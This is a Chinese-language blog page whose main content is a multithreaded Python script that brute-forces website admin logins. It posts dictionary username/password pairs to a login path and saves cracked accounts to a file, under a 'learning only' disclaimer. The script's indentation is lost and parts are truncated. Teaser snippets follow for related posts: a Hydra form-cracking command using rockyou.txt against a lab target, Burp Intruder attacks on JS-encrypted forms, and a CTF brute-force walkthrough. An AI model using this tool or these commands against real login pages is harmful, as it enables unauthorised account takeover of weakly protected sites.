# -*- coding: utf-8 -*-
#利用python 寫的多執行緒爆破後台使用者名稱+密碼(自備字典),比較實用,即使是在資訊保安這麼重視的今天,
#還是有人不加驗證碼或者異常訪問限制之類的登陸驗證方式,這樣就很容易被弱口令爆破工具拿下,
#(本**僅限學習實用,禁止進行web攻擊,不承擔法律責任)
"referer":""};# referer:是**的訪問**位址
# lock = threading.lock()
def tryuser(user,password):
#print user,password
global headers
global outfile
conn = httplib.httpconnection("www.***xx.com") # 遠端網域名稱
if len(user) < 3: # 限制使用者名稱長度,排除字典中的無用資料
return # 主動退出執行緒
else:
#lock.acquire() # 多執行緒操作檔案,提前加鎖,用後釋放
#line = infile.readline()
#userdata = line.strip().split(' # ') # strip() 預設去除空白字元包括' ','\t','\n'等
#lock.release()
user = user.strip()
passwd = password.strip()
params = urllib.urlencode()
conn.request(method="post", url="/users/login", body=params, headers=headers) # 後台路徑
responsetext = conn.getresponse().read().decode('utf8') # 網頁編碼
#print responsetext # 第一次可以列印看看是否解析
if not responsetext.find(u'使用者名稱或者密碼不正確,請重新輸入!') > 0 :
print '----- find user:', user, 'with password:', passwd, '-----'
outfile.write(user + ' ' + passwd + '\n')
return
outfile = open('accounts-cracked.txt', 'w')
if __name__ == '__main__':
tsk= # 建立執行緒池
with open(r'user.dic', 'r') as fuser:
# 使用with as 來開啟檔案,不需自己關閉檔案,因為他會自己在合適的時候自已關閉(類似c# 中的using(...){}介面)
with open(r'pass.dic', 'r') as fpass:
for user in fuser.readlines():
for password in fpass.readlines():
t= threading.thread(target = tryuser,args=(user,password))
t.daemon = false # 設定不進行程序守護
fpass.seek(0)
# 記住這裡要將檔案重新移到檔案首,不然就會出現只執行外層迴圈的第一條,因為內層在
# 迭代之後(readlines()是迭代器的形式,迭代一次後檔案指標就指到檔案尾了,迭代器
# 也是end了)第二次就沒有password 在 fpass中,也就是說 for password in fpass.readlines():
# 為空,所以這裡的內層迴圈就不會被執行了,因此也就是迭代器清零的問題(c ++ itertor 常有)
# join()無引數就是完全阻塞主線程,等待執行緒執行完 有引數就是說,
# 在主線程等待一秒後就不阻塞執行緒了,繼續執行主線程,這裡的意思是一秒鐘開乙個執行緒
# 不能再thread start之前呼叫join(), 因為join() 是執行緒執行時排程
for t in tsk:
t.start()
t.join(1)
print "all thread ok,maybe not "
outfile.close()
使用Hydra爆破表單
部落格位址 github kali linux web靶機 github傳送門 靶機表單內容如下 表單截圖 假設網域名稱為host.com,表單路徑為 pikachu vul burteforce bf form.php 執行命令如下 hydra l admin p root rockyou.txt...
Web暴力破解 前端JS表單加密進行爆破
0x01 前言 常見的js實現加密的方式有 md5 base64 shal,寫了乙個簡單的demo作為測試。0x02 login.html 提交表單,進行抓包,可以發現密碼字段密碼進行了加密處理 0x03 web暴力猜解 方式一 burp suite 使用intruder進行暴力猜解,intrude...
WEB入門 爆破21 28
web21 首先嘗試 後台常見登陸的弱口令,發現錯誤 則使用burp suite抓包試試看 通過分析,在未填入賬號密碼時,響應頭如下所示 填入弱口令賬號密碼,發現響應頭如下 則對應可知賬號密碼被加密為base64文字,則可通過burpsuite的爆破模組進行對密碼的爆破,字典選用題目附件中的後台常見...